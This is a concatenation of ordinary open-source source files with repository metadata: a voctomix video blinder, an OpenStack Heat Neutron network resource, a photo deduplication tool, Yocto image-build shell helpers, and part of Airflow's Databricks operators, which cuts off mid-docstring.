name=queue-audio-blinded-audiomixer-blinder
! audiomixer-blinder.
"""
# close bin
self.bin += "" if Args.no_bins else "\n)\n"
self.blind_source = 0 if len(self.blindersources) > 0 else None
def __str__(self):
return 'Blinder'
def attach(self, pipeline):
self.pipeline = pipeline
self.applyMixerState()
def applyMixerState(self):
for livesource in self.livesources:
self.applyMixerStateVideo(
'compositor-blinder-{}'.format(livesource))
self.applyMixerStateVideo(
'compositor-blinder-{}'.format(livesource))
self.applyMixerStateAudio('audiomixer-blinder')
def applyMixerStateVideo(self, mixername):
mixer = self.pipeline.get_by_name(mixername)
if not mixer:
self.log.error("Video mixer '%s' not found", mixername)
else:
mixer.get_static_pad('sink_0').set_property(
'alpha', int(self.blind_source is None))
for idx, name in enumerate(self.blindersources):
blinder_pad = mixer.get_static_pad('sink_%u' % (idx + 1))
blinder_pad.set_property(
'alpha', int(self.blind_source == idx))
def applyMixerStateAudio(self, mixername):
mixer = self.pipeline.get_by_name(mixername)
if not mixer:
self.log.error("Audio mixer '%s' not found", mixername)
else:
mixer.get_static_pad('sink_0').set_property(
'volume', 1.0 if self.blind_source is None else 0.0)
mixer.get_static_pad('sink_1').set_property(
'volume', 0.0 if self.blind_source is None else 1.0)
def setBlindSource(self, source):
self.blind_source = source
self.applyMixerState()
| {
"content_hash": "c6007d2959642b8dcbb8cf3a22fd94bd",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 96,
"avg_line_length": 33.50349650349651,
"alnum_prop": 0.5312043414735963,
"repo_name": "voc/voctomix",
"id": "5c60e6da230569124a3f273401e6e1cfb8154f8e",
"size": "4814",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "voctocore/lib/blinder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2621"
},
{
"name": "Dockerfile",
"bytes": "2626"
},
{
"name": "Python",
"bytes": "350063"
},
{
"name": "Shell",
"bytes": "25187"
}
],
"symlink_target": ""
} |
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Net(neutron.NeutronResource):
"""A resource for managing Neutron net.
A network is a virtual isolated layer-2 broadcast domain which is typically
reserved to the tenant who created it, unless the network has been
explicitly configured to be shared.
"""
entity = 'network'
PROPERTIES = (
NAME, VALUE_SPECS, ADMIN_STATE_UP, TENANT_ID, SHARED,
DHCP_AGENT_IDS, PORT_SECURITY_ENABLED, QOS_POLICY,
DNS_DOMAIN, TAGS,
) = (
'name', 'value_specs', 'admin_state_up', 'tenant_id', 'shared',
'dhcp_agent_ids', 'port_security_enabled', 'qos_policy',
'dns_domain', 'tags',
)
ATTRIBUTES = (
STATUS, NAME_ATTR, SUBNETS, ADMIN_STATE_UP_ATTR, TENANT_ID_ATTR,
PORT_SECURITY_ENABLED_ATTR, MTU_ATTR, QOS_POLICY_ATTR, L2_ADJACENCY,
SEGMENTS,
) = (
"status", "name", "subnets", "admin_state_up", "tenant_id",
"port_security_enabled", "mtu", 'qos_policy_id', 'l2_adjacency',
'segments',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('A string specifying a symbolic name for the network, which is '
'not required to be unique.'),
update_allowed=True
),
VALUE_SPECS: properties.Schema(
properties.Schema.MAP,
_('Extra parameters to include in the request. Parameters are '
'often specific to installed hardware or extensions.'),
default={},
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('A boolean value specifying the administrative status of the '
'network.'),
default=True,
update_allowed=True
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant which will own the network. Only '
'administrative users can set the tenant identifier; this '
'cannot be changed using authorization policies.')
),
SHARED: properties.Schema(
properties.Schema.BOOLEAN,
_('Whether this network should be shared across all tenants. '
'Note that the default policy setting restricts usage of this '
'attribute to administrative users only.'),
default=False,
update_allowed=True
),
DHCP_AGENT_IDS: properties.Schema(
properties.Schema.LIST,
_('The IDs of the DHCP agent to schedule the network. Note that '
'the default policy setting in Neutron restricts usage of this '
'property to administrative users only.'),
update_allowed=True
),
PORT_SECURITY_ENABLED: properties.Schema(
properties.Schema.BOOLEAN,
_('Flag to enable/disable port security on the network. It '
'provides the default value for the attribute of the ports '
'created on this network.'),
update_allowed=True,
support_status=support.SupportStatus(version='5.0.0')
),
QOS_POLICY: properties.Schema(
properties.Schema.STRING,
_('The name or ID of QoS policy to attach to this network.'),
constraints=[
constraints.CustomConstraint('neutron.qos_policy')
],
update_allowed=True,
support_status=support.SupportStatus(version='6.0.0')
),
DNS_DOMAIN: properties.Schema(
properties.Schema.STRING,
_('DNS domain associated with this network.'),
constraints=[
constraints.CustomConstraint('dns_domain')
],
update_allowed=True,
support_status=support.SupportStatus(version='7.0.0')
),
TAGS: properties.Schema(
properties.Schema.LIST,
_('The tags to be added to the network.'),
schema=properties.Schema(properties.Schema.STRING),
update_allowed=True,
support_status=support.SupportStatus(version='9.0.0')
),
}
attributes_schema = {
STATUS: attributes.Schema(
_("The status of the network."),
type=attributes.Schema.STRING
),
NAME_ATTR: attributes.Schema(
_("The name of the network."),
type=attributes.Schema.STRING
),
SUBNETS: attributes.Schema(
_("Subnets of this network."),
type=attributes.Schema.LIST
),
ADMIN_STATE_UP_ATTR: attributes.Schema(
_("The administrative status of the network."),
type=attributes.Schema.STRING
),
TENANT_ID_ATTR: attributes.Schema(
_("The tenant owning this network."),
type=attributes.Schema.STRING
),
PORT_SECURITY_ENABLED_ATTR: attributes.Schema(
_("Port security enabled of the network."),
support_status=support.SupportStatus(version='5.0.0'),
type=attributes.Schema.BOOLEAN
),
MTU_ATTR: attributes.Schema(
_("The maximum transmission unit size(in bytes) for the network."),
support_status=support.SupportStatus(version='5.0.0'),
type=attributes.Schema.INTEGER
),
QOS_POLICY_ATTR: attributes.Schema(
_("The QoS policy ID attached to this network."),
type=attributes.Schema.STRING,
support_status=support.SupportStatus(version='6.0.0'),
),
L2_ADJACENCY: attributes.Schema(
_("A boolean value for L2 adjacency, True means that you can "
"expect L2 connectivity throughout the Network."),
type=attributes.Schema.BOOLEAN,
support_status=support.SupportStatus(version='9.0.0'),
),
SEGMENTS: attributes.Schema(
_("The segments of this network."),
type=attributes.Schema.LIST,
support_status=support.SupportStatus(version='11.0.0'),
),
}
def translation_rules(self, properties):
return [translation.TranslationRule(
properties,
translation.TranslationRule.RESOLVE,
[self.QOS_POLICY],
client_plugin=self.client_plugin(),
finder='get_qos_policy_id')]
def handle_create(self):
props = self.prepare_properties(
self.properties,
self.physical_resource_name())
dhcp_agent_ids = props.pop(self.DHCP_AGENT_IDS, None)
qos_policy = props.pop(self.QOS_POLICY, None)
tags = props.pop(self.TAGS, [])
if qos_policy:
props['qos_policy_id'] = qos_policy
net = self.client().create_network({'network': props})['network']
self.resource_id_set(net['id'])
if dhcp_agent_ids:
self._replace_dhcp_agents(dhcp_agent_ids)
if tags:
self.set_tags(tags)
def check_create_complete(self, *args):
attributes = self._show_resource()
self._store_config_default_properties(attributes)
return self.is_built(attributes)
def handle_delete(self):
try:
self.client().delete_network(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
else:
return True
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
self.prepare_update_properties(prop_diff)
if self.DHCP_AGENT_IDS in prop_diff:
dhcp_agent_ids = prop_diff.pop(self.DHCP_AGENT_IDS) or []
self._replace_dhcp_agents(dhcp_agent_ids)
if self.QOS_POLICY in prop_diff:
qos_policy = prop_diff.pop(self.QOS_POLICY)
prop_diff[
'qos_policy_id'] = self.client_plugin().get_qos_policy_id(
qos_policy) if qos_policy else None
if self.TAGS in prop_diff:
self.set_tags(prop_diff.pop(self.TAGS))
if prop_diff:
self.client().update_network(self.resource_id,
{'network': prop_diff})
def check_update_complete(self, *args):
attributes = self._show_resource()
return self.is_built(attributes)
def _replace_dhcp_agents(self, dhcp_agent_ids):
ret = self.client().list_dhcp_agent_hosting_networks(
self.resource_id)
old = set([agent['id'] for agent in ret['agents']])
new = set(dhcp_agent_ids)
for dhcp_agent_id in new - old:
try:
self.client().add_network_to_dhcp_agent(
dhcp_agent_id, {'network_id': self.resource_id})
except Exception as ex:
# if 409 is happened, the agent is already associated.
if not self.client_plugin().is_conflict(ex):
raise
for dhcp_agent_id in old - new:
try:
self.client().remove_network_from_dhcp_agent(
dhcp_agent_id, self.resource_id)
except Exception as ex:
# assume 2 patterns about status_code following:
# 404: the network or agent is already gone
# 409: the network isn't scheduled by the dhcp_agent
if not (self.client_plugin().is_conflict(ex) or
self.client_plugin().is_not_found(ex)):
raise
def parse_live_resource_data(self, resource_properties, resource_data):
result = super(Net, self).parse_live_resource_data(
resource_properties, resource_data)
result.pop(self.SHARED)
result[self.QOS_POLICY] = resource_data.get('qos_policy_id')
try:
dhcp = self.client().list_dhcp_agent_hosting_networks(
self.resource_id)
dhcp_agents = set([agent['id'] for agent in dhcp['agents']])
result.update({self.DHCP_AGENT_IDS: list(dhcp_agents)})
except self.client_plugin().exceptions.Forbidden:
# Just don't add dhcp_clients if we can't get values.
pass
return result
def _resolve_attribute(self, name):
if self.resource_id is None:
return
if name == self.SEGMENTS:
return [segment.to_dict() for segment in list(self.client(
'openstack').network.segments(network_id=self.resource_id))]
attributes = self._show_resource()
return attributes[name]
def resource_mapping():
return {
'OS::Neutron::Net': Net,
}
| {
"content_hash": "7751c675171b64f8638d4e8ec83a6c5c",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 79,
"avg_line_length": 38.93992932862191,
"alnum_prop": 0.5774954627949184,
"repo_name": "noironetworks/heat",
"id": "62a19e1ff75d18c7cd6bf5f2b8625f23281e257b",
"size": "11595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heat/engine/resources/openstack/neutron/net.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8804896"
},
{
"name": "Shell",
"bytes": "64533"
}
],
"symlink_target": ""
} |
import logging
import itertools
import os
import sqlite3
import exifread
from photodedup.fileindex import FileIndex
logger = logging.getLogger()
class PhotoDedup():
"""
Photodedup deduplicates all image files stored within a directory. It uses sqlite to store exif info for images,
and uses a built-in fileindex to quickly find new/deleted files.
"""
def __init__(self, image_folder_path):
# Create photoindex folder
photoindexfolder = os.path.join(os.path.expanduser("~"), ".photoindex")
try:
os.mkdir(photoindexfolder)
except:
logger.debug("Can't make folder")
# Create SQLlite connection
self.conn=sqlite3.connect(os.path.join(photoindexfolder, "images.sqlite"))
self.image_folder_path=image_folder_path
self.fileindex= FileIndex(image_folder_path)
def scan_images(self):
"""
Scan images using the fileindex.
:return:
"""
self.fileindex.scanfiles()
self._insert_images(self.fileindex.get_new_images())
self._delete_images(self.fileindex.get_deleted_images())
def create_index(self):
logger.info("Create index if not exists")
cur = self.conn.cursor()
cur.execute('''create table if not exists images
(timestamp text ,
CreateDate text,
GPSLatitude real,
GPSLongitude real,
GPSAltitude real ,
SourceFile text,
PRIMARY KEY (timestamp, SourceFile)
)''')
def get_duplicate_images(self):
cur = self.conn.cursor()
sql='''
select * from images
where timestamp in (
select timestamp from images
where timestamp != ""
group by timestamp
having count(*)>1)
except
select *
from images
group by timestamp
'''
result = [row[5] for row in cur.execute(sql)]
return result
def get_unique_images(self):
cur = self.conn.cursor()
sql='''
select * from images
group by timestamp
order by SourceFile
'''
result = [row[5] for row in cur.execute(sql)]
return result
def print(self, result):
for image in result:
print(image)
def _insert_images(self, new_images):
cur = self.conn.cursor()
count = 0
for meta_data_list in split_every(1000, self.__get_images_metadata(new_images)):
columns = [(str(d.get("EXIF DateTimeOriginal", d.get("Image DateTime", ""))),
str(d.get("EXIF DateTimeOriginal", "")),
str(d.get("GPS GPSLatitude", "")),
str(d.get("GPS GPSLongitude", "")),
str(d.get("GPS GPSAltitude", "")),
d.get("SourceFile", "")
) for d in meta_data_list]
count += len(columns)
logger.info("Processed %d images..." % count)
for metadata in meta_data_list:
logger.debug("inserting %s", metadata.get("SourceFile", ""))
cur.executemany("insert or ignore into images values (?, ?, ? ,?, ?, ?)", columns)
self.conn.commit()
def _delete_images(self, new_images):
cur = self.conn.cursor()
count = 0
for imagelist in split_every(1000, new_images):
if imagelist:
columns = [(image,) for image in imagelist]
cur.executemany("delete from images where SourceFile=?", columns)
self.conn.commit()
def __get_images_metadata(self, images):
for filename in images:
f=open(filename, "rb")
tags = exifread.process_file(f, details=False)
tags["SourceFile"]=filename
yield tags
f.close()
def split_every(n, iterable):
i = iter(iterable)
piece = list(itertools.islice(i, n))
while piece:
yield piece
piece = list(itertools.islice(i, n))
| {
"content_hash": "7676a3f22fbbb9d7cc323ae177ae82ba",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 116,
"avg_line_length": 30.82962962962963,
"alnum_prop": 0.5478135511773186,
"repo_name": "puyuan/photodedup",
"id": "3402a57386545b1ae0f68046546768ae7c7320af",
"size": "4201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "photodedup/photodedup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "9075"
}
],
"symlink_target": ""
} |
from mic import msger
from mic.utils import runner
def exec_cmd(cmd_and_args, as_shell = False, catch = 3):
"""
Execute command, catching stderr, stdout
Need to execute as_shell if the command uses wildcards
"""
msger.debug("exec_cmd: %s" % cmd_and_args)
args = cmd_and_args.split()
msger.debug(args)
if (as_shell):
rc, out = runner.runtool(cmd_and_args, catch)
else:
rc, out = runner.runtool(args, catch)
out = out.strip()
msger.debug("exec_cmd: output for %s (rc = %d): %s" % \
(cmd_and_args, rc, out))
if rc != 0:
# We don't throw exception when return code is not 0, because
# parted always fails to reload part table with loop devices. This
# prevents us from distinguishing real errors based on return
# code.
msger.warning("WARNING: %s returned '%s' instead of 0" % (cmd_and_args, rc))
return (rc, out)
def exec_cmd_quiet(cmd_and_args, as_shell = False):
"""
Execute command, catching nothing in the output
Need to execute as_shell if the command uses wildcards
"""
return exec_cmd(cmd_and_args, as_shell, 0)
def exec_native_cmd(cmd_and_args, native_sysroot, catch = 3):
"""
Execute native command, catching stderr, stdout
Need to execute as_shell if the command uses wildcards
Always need to execute native commands as_shell
"""
native_paths = \
"export PATH=%s/sbin:%s/usr/sbin:%s/usr/bin:$PATH" % \
(native_sysroot, native_sysroot, native_sysroot)
native_cmd_and_args = "%s;%s" % (native_paths, cmd_and_args)
msger.debug("exec_native_cmd: %s" % cmd_and_args)
args = cmd_and_args.split()
msger.debug(args)
rc, out = exec_cmd(native_cmd_and_args, True, catch)
if rc == 127: # shell command-not-found
msger.error("A native (host) program required to build the image "
"was not found (see details above). Please make sure "
"it's installed and try again.")
return (rc, out)
def exec_native_cmd_quiet(cmd_and_args, native_sysroot):
"""
Execute native command, catching nothing in the output
Need to execute as_shell if the command uses wildcards
Always need to execute native commands as_shell
"""
return exec_native_cmd(cmd_and_args, native_sysroot, 0)
# kickstart doesn't support variable substution in commands, so this
# is our current simplistic scheme for supporting that
wks_vars = dict()
def get_wks_var(key):
return wks_vars[key]
def add_wks_var(key, val):
wks_vars[key] = val
BOOTDD_EXTRA_SPACE = 16384
IMAGE_EXTRA_SPACE = 10240
__bitbake_env_lines = ""
def set_bitbake_env_lines(bitbake_env_lines):
global __bitbake_env_lines
__bitbake_env_lines = bitbake_env_lines
def get_bitbake_env_lines():
return __bitbake_env_lines
def get_line_val(line, key):
"""
Extract the value from the VAR="val" string
"""
if line.startswith(key + "="):
stripped_line = line.split('=')[1]
stripped_line = stripped_line.replace('\"', '')
return stripped_line
return None
def get_bitbake_var(key):
for line in __bitbake_env_lines.split('\n'):
if (get_line_val(line, key)):
val = get_line_val(line, key)
return val
return None
| {
"content_hash": "b75b3bb1cb2b4dd543227ddef5d14eb1",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 84,
"avg_line_length": 28.572649572649574,
"alnum_prop": 0.6317678731678134,
"repo_name": "marcosbontempo/inatelos",
"id": "7ad3aa968502520e8c0d65b137e1258e07968652",
"size": "4324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poky-daisy/scripts/lib/mic/utils/oe/misc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "158"
},
{
"name": "BitBake",
"bytes": "1910696"
},
{
"name": "BlitzBasic",
"bytes": "4400"
},
{
"name": "C",
"bytes": "1751572"
},
{
"name": "C++",
"bytes": "354295"
},
{
"name": "CMake",
"bytes": "6537"
},
{
"name": "CSS",
"bytes": "27029"
},
{
"name": "Groff",
"bytes": "502444"
},
{
"name": "HTML",
"bytes": "141762"
},
{
"name": "JavaScript",
"bytes": "22555"
},
{
"name": "Lua",
"bytes": "1194"
},
{
"name": "Makefile",
"bytes": "32254"
},
{
"name": "Nginx",
"bytes": "2744"
},
{
"name": "Perl",
"bytes": "66300"
},
{
"name": "Perl6",
"bytes": "73"
},
{
"name": "Python",
"bytes": "3529760"
},
{
"name": "Shell",
"bytes": "598521"
},
{
"name": "Tcl",
"bytes": "60106"
},
{
"name": "VimL",
"bytes": "8506"
},
{
"name": "XSLT",
"bytes": "8814"
}
],
"symlink_target": ""
} |
"""This module contains Databricks operators."""
import time
from typing import Any, Dict, List, Optional, Union
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.databricks.hooks.databricks import DatabricksHook
XCOM_RUN_ID_KEY = 'run_id'
XCOM_RUN_PAGE_URL_KEY = 'run_page_url'
def _deep_string_coerce(content, json_path: str = 'json') -> Union[str, list, dict]:
"""
Coerces content or all values of content if it is a dict to a string. The
function will throw if content contains non-string or non-numeric types.
The reason why we have this function is because the ``self.json`` field must be a
dict with only string values. This is because ``render_template`` will fail
for numerical values.
"""
coerce = _deep_string_coerce
if isinstance(content, str):
return content
elif isinstance(
content,
(
int,
float,
),
):
# Databricks can tolerate either numeric or string types in the API backend.
return str(content)
elif isinstance(content, (list, tuple)):
return [coerce(e, f'{json_path}[{i}]') for i, e in enumerate(content)]
elif isinstance(content, dict):
return {k: coerce(v, f'{json_path}[{k}]') for k, v in list(content.items())}
else:
param_type = type(content)
msg = f'Type {param_type} used for parameter {json_path} is not a number or a string'
raise AirflowException(msg)
def _handle_databricks_operator_execution(operator, hook, log, context) -> None:
"""
Handles the Airflow + Databricks lifecycle logic for a Databricks operator
:param operator: Databricks operator being handled
:param context: Airflow context
"""
if operator.do_xcom_push:
context['ti'].xcom_push(key=XCOM_RUN_ID_KEY, value=operator.run_id)
log.info('Run submitted with run_id: %s', operator.run_id)
run_page_url = hook.get_run_page_url(operator.run_id)
if operator.do_xcom_push:
context['ti'].xcom_push(key=XCOM_RUN_PAGE_URL_KEY, value=run_page_url)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
while True:
run_state = hook.get_run_state(operator.run_id)
if run_state.is_terminal:
if run_state.is_successful:
log.info('%s completed successfully.', operator.task_id)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
return
else:
error_message = f'{operator.task_id} failed with terminal state: {run_state}'
raise AirflowException(error_message)
else:
log.info('%s in run state: %s', operator.task_id, run_state)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
log.info('Sleeping for %s seconds.', operator.polling_period_seconds)
time.sleep(operator.polling_period_seconds)
class DatabricksSubmitRunOperator(BaseOperator):
"""
Submits a Spark job run to Databricks using the
`api/2.0/jobs/runs/submit
<https://docs.databricks.com/api/latest/jobs.html#runs-submit>`_
API endpoint.
There are two ways to instantiate this operator.
In the first way, you can take the JSON payload that you typically use
to call the ``api/2.0/jobs/runs/submit`` endpoint and pass it directly
to our ``DatabricksSubmitRunOperator`` through the ``json`` parameter.
For example ::
json = {
'new_cluster': {
'spark_version': '2.1.0-db3-scala2.11',
'num_workers': 2
},
'notebook_task': {
'notebook_path': '/Users/airflow@example.com/PrepareData',
},
}
notebook_run = DatabricksSubmitRunOperator(task_id='notebook_run', json=json)
Another way to accomplish the same thing is to use the named parameters
of the ``DatabricksSubmitRunOperator`` directly. Note that there is exactly
one named parameter for each top level parameter in the ``runs/submit``
endpoint. In this method, your code would look like this: ::
new_cluster = {
'spark_version': '2.1.0-db3-scala2.11',
'num_workers': 2
}
notebook_task = {
'notebook_path': '/Users/airflow@example.com/PrepareData',
}
notebook_run = DatabricksSubmitRunOperator(
task_id='notebook_run',
new_cluster=new_cluster,
notebook_task=notebook_task)
In the case where both the json parameter **AND** the named parameters
are provided, they will be merged together. If there are conflicts during the merge,
the named parameters will take precedence and override the top level ``json`` keys.
Currently the named parameters that ``DatabricksSubmitRunOperator`` supports are
- ``spark_jar_task``
- ``notebook_task``
- ``spark_python_task``
- ``spark_submit_task``
- ``new_cluster``
- ``existing_cluster_id``
- ``libraries``
- ``run_name``
- ``timeout_seconds``
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:DatabricksSubmitRunOperator`
:param json: A JSON object containing API parameters which will be passed
directly to the ``api/2.0/jobs/runs/submit`` endpoint. The other named parameters
(i.e. ``spark_jar_task``, ``notebook_task``..) to this operator will
be merged with this json dictionary if they are provided.
If there are conflicts during the merge, the named parameters will
take precedence and override the top level json keys. (templated)
.. seealso::
For more information about templating see :ref:`concepts:jinja-templating`.
https://docs.databricks.com/api/latest/jobs.html#runs-submit
:type json: dict
:param spark_jar_task: The main class and parameters for the JAR task. Note that
the actual JAR is specified in the ``libraries``.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparkjartask
:type spark_jar_task: dict
:param notebook_task: The notebook path and parameters for the notebook task.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobsnotebooktask
:type notebook_task: dict
:param spark_python_task: The python file path and parameters to run the python file with.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparkpythontask
:type spark_python_task: dict
:param spark_submit_task: Parameters needed to run a spark-submit command.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparksubmittask
:type spark_submit_task: dict
:param new_cluster: Specs for a new cluster on which this task will be run.
*EITHER* ``new_cluster`` *OR* ``existing_cluster_id`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobsclusterspecnewcluster
:type new_cluster: dict
:param existing_cluster_id: ID for existing cluster on which to run this task.
*EITHER* ``new_cluster`` *OR* ``existing_cluster_id`` should be specified.
This field will be templated.
:type existing_cluster_id: str
:param libraries: Libraries which this run will use.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/libraries.html#managedlibrarieslibrary
:type libraries: list of dicts
:param run_name: The run name used for this task.
By default this will be set to the Airflow ``task_id``. This ``task_id`` is a
required parameter of the superclass ``BaseOperator``.
This field will be templated.
:type run_name: str
:param timeout_seconds: The timeout for this run. By default a value of 0 is used
which means to have no timeout.
This field will be templated.
:type timeout_seconds: int32
:param databricks_conn_id: Reference to the :ref:`Databricks connection <howto/connection:databricks>`.
By default and in the common case this will be ``databricks_default``. To use
token based authentication, provide the key ``token`` in the extra field for the
connection and create the key ``host`` and leave the ``host`` field empty.
:type databricks_conn_id: str
:param polling_period_seconds: Controls the rate which we poll for the result of
this run. By default the operator will poll every 30 seconds.
:type polling_period_seconds: int
:param databricks_retry_limit: Amount of times retry if the Databricks backend is
unreachable. Its value must be greater than or equal to 1.
:type databricks_retry_limit: int
:param databricks_retry_delay: Number of seconds to wait between retries (it
might be a floating point number).
:type databricks_retry_delay: float
:param do_xcom_push: Whether we should push run_id and run_page_url to xcom.
:type do_xcom_push: bool
"""
# Used in airflow.models.BaseOperator
template_fields = ('json',)
# Databricks brand color (blue) under white text
ui_color = '#1CB1C2'
ui_fgcolor = '#fff'
def __init__(
self,
*,
json: Optional[Any] = None,
spark_jar_task: Optional[Dict[str, str]] = None,
notebook_task: Optional[Dict[str, str]] = None,
spark_python_task: Optional[Dict[str, Union[str, List[str]]]] = None,
spark_submit_task: Optional[Dict[str, List[str]]] = None,
new_cluster: Optional[Dict[str, object]] = None,
existing_cluster_id: Optional[str] = None,
libraries: Optional[List[Dict[str, str]]] = None,
run_name: Optional[str] = None,
timeout_seconds: Optional[int] = None,
databricks_conn_id: str = 'databricks_default',
polling_period_seconds: int = 30,
databricks_retry_limit: int = 3,
databricks_retry_delay: int = 1,
do_xcom_push: bool = False,
**kwargs,
) -> None:
"""Creates a new ``DatabricksSubmitRunOperator``."""
super().__init__(**kwargs)
self.json = json or {}
self.databricks_conn_id = databricks_conn_id
self.polling_period_seconds = polling_period_seconds
self.databricks_retry_limit = databricks_retry_limit
self.databricks_retry_delay = databricks_retry_delay
if spark_jar_task is not None:
self.json['spark_jar_task'] = spark_jar_task
if notebook_task is not None:
self.json['notebook_task'] = notebook_task
if spark_python_task is not None:
self.json['spark_python_task'] = spark_python_task
if spark_submit_task is not None:
self.json['spark_submit_task'] = spark_submit_task
if new_cluster is not None:
self.json['new_cluster'] = new_cluster
if existing_cluster_id is not None:
self.json['existing_cluster_id'] = existing_cluster_id
if libraries is not None:
self.json['libraries'] = libraries
if run_name is not None:
self.json['run_name'] = run_name
if timeout_seconds is not None:
self.json['timeout_seconds'] = timeout_seconds
if 'run_name' not in self.json:
self.json['run_name'] = run_name or kwargs['task_id']
self.json = _deep_string_coerce(self.json)
# This variable will be used in case our task gets killed.
self.run_id = None
self.do_xcom_push = do_xcom_push
def _get_hook(self) -> DatabricksHook:
return DatabricksHook(
self.databricks_conn_id,
retry_limit=self.databricks_retry_limit,
retry_delay=self.databricks_retry_delay,
)
def execute(self, context):
hook = self._get_hook()
self.run_id = hook.submit_run(self.json)
_handle_databricks_operator_execution(self, hook, self.log, context)
def on_kill(self):
hook = self._get_hook()
hook.cancel_run(self.run_id)
self.log.info('Task: %s with run_id: %s was requested to be cancelled.', self.task_id, self.run_id)
class DatabricksRunNowOperator(BaseOperator):
"""
Runs an existing Spark job run to Databricks using the
`api/2.0/jobs/run-now
<https://docs.databricks.com/api/latest/jobs.html#run-now>`_
API endpoint.
There are two ways to instantiate this operator.
In the first way, you can take the JSON payload that you typically use
to call the ``api/2.0/jobs/run-now`` endpoint and pass it directly
to our ``DatabricksRunNowOperator`` through the ``json`` parameter.
For example ::
json = {
"job_id": 42,
"notebook_params": {
"dry-run": "true",
"oldest-time-to-consider": "1457570074236"
}
}
notebook_run = DatabricksRunNowOperator(task_id='notebook_run', json=json)
Another way to accomplish the same thing is to use the named parameters
of the ``DatabricksRunNowOperator`` directly. Note that there is exactly
one named parameter for each top level parameter in the ``run-now``
endpoint. In this method, your code would look like this: ::
job_id=42
notebook_params = {
"dry-run": "true",
"oldest-time-to-consider": "1457570074236"
}
python_params = ["douglas adams", "42"]
spark_submit_params = ["--class", "org.apache.spark.examples.SparkPi"]
notebook_run = DatabricksRunNowOperator(
job_id=job_id,
notebook_params=notebook_params,
python_params=python_params,
spark_submit_params=spark_submit_params
)
In the case where both the json parameter **AND** the named parameters
are provided, they will be merged together. If there are conflicts during the merge,
the named parameters will take precedence and override the top level ``json`` keys.
Currently the named parameters that ``DatabricksRunNowOperator`` supports are
- ``job_id``
- ``json``
- ``notebook_params``
- ``python_params``
- ``spark_submit_params``
:param job_id: the job_id of the existing Databricks job.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type job_id: str
:param json: A JSON object containing API parameters which will be passed
directly to the ``api/2.0/jobs/run-now`` endpoint. The other named parameters
(i.e. ``notebook_params``, ``spark_submit_params``..) to this operator will
be merged with this json dictionary if they are provided.
If there are conflicts during the merge, the named parameters will
take precedence and override the top level json keys. (templated)
.. seealso::
For more information about templating see :ref:`concepts:jinja-templating`.
https://docs.databricks.com/api/latest/jobs.html#run-now
:type json: dict
:param notebook_params: A dict from keys to values for jobs with notebook task,
e.g. "notebook_params": {"name": "john doe", "age": "35"}.
The map is passed to the notebook and will be accessible through the
dbutils.widgets.get function. See Widgets for more information.
If not specified upon run-now, the triggered run will use the
job’s base parameters. notebook_params cannot be
specified in conjunction with jar_params. The json representation
of this field (i.e. {"notebook_params":{"name":"john doe","age":"35"}})
cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/user-guide/notebooks/widgets.html
:type notebook_params: dict
:param python_params: A list of parameters for jobs with python tasks,
e.g. "python_params": ["john doe", "35"].
The parameters will be passed to python file as command line parameters.
If specified upon run-now, it would overwrite the parameters specified in
job setting.
The json representation of this field (i.e. {"python_params":["john doe","35"]})
cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type python_params: list[str]
:param spark_submit_params: A list of parameters for jobs with spark submit task,
e.g. "spark_submit_params": ["--class", "org.apache.spark.examples.SparkPi"].
The parameters will be passed to spark-submit script as command line parameters.
If specified upon run-now, it would overwrite the parameters specified
in job setting.
The json representation of this field cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type spark_submit_params: list[str]
:param timeout_seconds: The timeout for this run. By default a value of 0 is used
which means to have no timeout.
This field will be templated.
:type timeout_seconds: int32
:param databricks_conn_id: Reference to the :ref:`Databricks connection <howto/connection:databricks>`.
